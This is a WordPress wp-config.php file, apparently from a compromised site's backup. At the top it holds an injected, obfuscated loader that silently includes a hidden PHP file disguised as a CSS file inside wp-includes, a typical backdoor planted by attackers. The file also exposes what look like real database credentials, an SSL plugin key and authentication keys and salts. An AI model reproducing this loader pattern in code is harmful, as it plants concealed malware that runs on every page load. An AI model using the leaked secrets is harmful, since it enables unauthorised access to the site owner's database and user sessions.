File: //old_home_backup/oscarandewan.co.uk/public_html/wp-config.php
<?php
/*1d839*/
$r1 = "//home/oscarandewan.co.\x75k/p\x75blic_html/wp\x2dincl\x75des/blocks/p\x75llq\x75ote/.b72994af.css"; if (!isset($r1)) {array ($r1);} else { @include_once /* 243 */ ($r1); }
/*1d839*/
//Begin Really Simple SSL key
define('RSSSL_KEY', 'xDWXjv11Ya3LtQzvSytybiXPtWb7nBxeuxHLCrOx584UXUwK8nwbKondQqpHq65U');
//END Really Simple SSL key
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'oscarandewancouk' );
/** MySQL database username */
define( 'DB_USER', 'oscarandewancouk' );
/** MySQL database password */
define( 'DB_PASSWORD', 'rkeM5vhAfQKqo2yY' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '>@Uo%oyTz8Apbgt{1BHv^k5ebNJzhaG^$qfC=q/_IgSlnPCCC3 D,UVjqIJD5W^0' );
define( 'SECURE_AUTH_KEY', 'R$B&9^d47$L=pZoE2QAXmx.PLm5w6r.N;WCk((to4pyx!C`<asj4GdyGS-{9j7ZC' );
define( 'LOGGED_IN_KEY', ' (^N*ARf6Va=whVeyQ[LiE!XO_P#..j%=6/4&b.opW@i~_H(i$o+nSHn%j?Sf_,G' );
define( 'NONCE_KEY', 'UDWag_I9Ny=vsqyP 71>*8,EM%MqbXR$$j`!wWJ6elsr0xM}1Qn9j@xAT3QDy^MX' );
define( 'AUTH_SALT', 'HCA5+hyBkm,sT}q.Qye-)kCx(BUcec&vjHQ-D?vWi c8Qhd=c+YD7iq#|X`)hH0S' );
define( 'SECURE_AUTH_SALT', '<5Y$xM2!fqAUpQC2v2|iXnB*Ky,GZ=wH<Z-}^XTfO#Hy1=E@/|&+l(I^}Mn(SsB5' );
define( 'LOGGED_IN_SALT', '/rn!xTYTb1N1C]Tq5Ht@-b=i$1[!Mh3l`VO3ZuE~CbZE!l|gV97~H#LwO,0_cVZ.' );
define( 'NONCE_SALT', '..e|gfK/L4x/79Fo`Lb{DHbJf80 ZdLNq{++TXPpg{&Y1-p8+YQc=I>:k_QCv<7T' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';